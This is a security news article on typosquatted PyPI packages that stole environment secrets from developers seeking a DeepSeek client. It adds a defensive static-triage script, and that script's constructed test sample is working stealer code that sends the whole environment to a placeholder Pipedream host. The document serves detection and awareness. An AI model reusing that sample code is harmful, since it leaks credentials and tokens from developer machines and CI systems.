Malicious Packages Targeting DeepSeek AI Users Discovered in PyPI Repository

CyberSecureFox 🦊

Security researchers at Positive Technologies have uncovered a supply chain attack on users of DeepSeek AI: malicious packages published to the Python Package Index (PyPI) under names that mimic a DeepSeek client library. The attack relied on typosquatting and shows how quickly threat actors now move to exploit developer interest in a newly popular AI tool.

Attack Vector and Technical Analysis

On January 29, 2025, an attacker operating under the username “bvk” published two malicious packages named deepseeek and deepseekai. The names are not misspellings of an established client library; they were chosen so that a developer searching PyPI for a DeepSeek API client would find and install them. The account had been created in June 2023 and stayed dormant until this campaign, a common pattern: an aged account draws less suspicion than one registered on the day of publication.

Malware Functionality and Data Exfiltration

The packages functioned as information stealers. The payload ran when the user invoked the console commands the packages registered as entry points (named after the packages themselves), which is exactly what a developer trying out a new client would do first. The stealer collected:
– Environment variables of the running process
– API keys for cloud services
– Database credentials
– Infrastructure access tokens
Most of those secrets live in environment variables on developer workstations and CI runners, so a single dump of the environment is enough to harvest them.

Command and Control Infrastructure

The stolen data was sent to a Pipedream endpoint, eoyyiyqubj7mquj.m.pipedream[.]net (defanged). Pipedream is a legitimate integration platform, so the exfiltration is an ordinary HTTPS request to a SaaS domain that developer machines and CI runners routinely contact. Blocking the domain by reputation alone will not catch this; a detection has to consider which process made the request and what the package itself does with the environment.
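The following is an added example, not PT PyAnalysis and not code from the campaign, of a pre-install triage check that looks for the combination described in the two sections above inside an unpacked sdist: a console_scripts entry point whose module both reads the process environment and carries an http(s) URL to a host outside an allow-list, with a known collector platform such as Pipedream called out separately. The sample distributions are constructed for the example; the pipedream hostname in them is a placeholder, not the C2 endpoint named in the article.

```python
"""Static triage of an unpacked sdist for the stealer pattern described above.
Added example with constructed samples; not PT PyAnalysis and not the campaign's code."""
import ast
from urllib.parse import urlparse

# Suffixes of legitimate SaaS/webhook platforms that make convenient exfiltration
# endpoints; ".pipedream.net" is the platform this campaign used.
COLLECTOR_SUFFIXES = (".pipedream.net",)


def console_script_modules(setup_src: str) -> list:
    """Modules behind console_scripts entry points declared in a setup.py."""
    modules = []
    for node in ast.walk(ast.parse(setup_src)):
        if not (isinstance(node, ast.Call) and getattr(node.func, "id", None) == "setup"):
            continue
        for kw in node.keywords:
            if kw.arg != "entry_points":
                continue
            try:
                entry_points = ast.literal_eval(kw.value)   # plain dict/list literal
            except ValueError:
                continue                                     # built dynamically: opaque
            for spec in entry_points.get("console_scripts", []):
                target = spec.split("=", 1)[1].strip()       # "pkg.mod:func"
                modules.append(target.split(":", 1)[0])
    return modules


def module_indicators(src: str) -> dict:
    """Two indicators per module: does it touch os.environ / os.getenv, and which
    hostnames appear in http(s) URL literals. (A `from os import environ` would
    evade this check; a real scanner resolves imports.)"""
    reads_env, hosts = False, set()
    for node in ast.walk(ast.parse(src)):
        if (isinstance(node, ast.Attribute) and node.attr in ("environ", "getenv")
                and isinstance(node.value, ast.Name) and node.value.id == "os"):
            reads_env = True
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            url = urlparse(node.value)
            if url.scheme in ("http", "https") and url.hostname:
                hosts.add(url.hostname)
    return {"reads_env": reads_env, "hosts": hosts}


def triage(files: dict, allowed_hosts=frozenset()) -> list:
    """files maps paths inside the sdist to source text. A finding is raised when an
    entry-point module reads the environment AND references a host outside the allow-list."""
    findings = []
    for module in console_script_modules(files.get("setup.py", "")):
        rel = module.replace(".", "/")
        src = files.get(rel + ".py", files.get(rel + "/__init__.py"))
        if src is None:
            findings.append(f"{module}: entry point targets a module missing from the sdist")
            continue
        ind = module_indicators(src)
        external = sorted(h for h in ind["hosts"] if h not in allowed_hosts)
        if ind["reads_env"] and external:
            collectors = [h for h in external if h.endswith(COLLECTOR_SUFFIXES)]
            msg = f"{module}: reads os.environ and references external host(s) {external}"
            if collectors:
                msg += f"; known collector platform: {collectors}"
            findings.append(msg)
    return findings


# Constructed sample modelled on the campaign's structure (not the real malware);
# the pipedream hostname is a placeholder, not the C2 endpoint named in the article.
MALICIOUS_SDIST = {
    "setup.py": '''
from setuptools import setup
setup(
    name="deepseeek",
    version="0.0.1",
    packages=["deepseeek"],
    entry_points={"console_scripts": ["deepseeek=deepseeek.cli:main"]},
)
''',
    "deepseeek/__init__.py": "",
    "deepseeek/cli.py": '''
import json
import os
import urllib.request

def main():
    payload = json.dumps(dict(os.environ)).encode()
    req = urllib.request.Request("https://example-hook.m.pipedream.net/", data=payload)
    urllib.request.urlopen(req)
''',
}

# Constructed benign package for contrast: it reads an API key from the
# environment too, but only talks to the vendor's own (allow-listed) API host.
BENIGN_SDIST = {
    "setup.py": '''
from setuptools import setup
setup(name="acme-client", entry_points={"console_scripts": ["acme=acme.cli:main"]})
''',
    "acme/cli.py": '''
import os
import urllib.request

def main():
    key = os.environ.get("ACME_API_KEY", "")
    urllib.request.urlopen("https://api.example.com/v1/ping?key=" + key)
''',
}

if __name__ == "__main__":
    for finding in triage(MALICIOUS_SDIST):
        print("FLAG", finding)
    print("benign:", triage(BENIGN_SDIST, allowed_hosts=frozenset({"api.example.com"})))
```

The benign sample is deliberately similar (it also reads a key from the environment and makes a request); the difference that matters is whether the destination host is one the organization has approved, which is why the allow-list, not the presence of network code, drives the verdict.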

Impact Assessment and Detection

The packages were downloaded 222 times before they were removed:
– 36 installations via pip and bandersnatch mirroring (bandersnatch mirrors fetch every new release, so not all of these were interactive installs)
– 186 downloads through browsers and various development tools
Positive Technologies’ PT PyAnalysis system flagged the packages within minutes of publication; the download count shows how much exposure a typosquat can generate even in that short window.

AI-Assisted Malware Development

A notable aspect of this campaign is that the code carries comments of the kind produced by AI coding assistants, which the researchers took as evidence that the malware was written with AI help. It fits an emerging pattern in which AI tools lower the effort needed to produce working malicious code, just as they are increasingly used on the defensive side.

This incident serves as a critical reminder of supply chain security risks in the Python ecosystem. Organizations and developers should implement strict package verification procedures, including checking package names for typosquatting, verifying publisher credentials, and maintaining comprehensive dependency audit processes. Additionally, implementing automated security scanning tools and maintaining an allow-list of trusted packages can significantly reduce exposure to similar supply chain attacks.
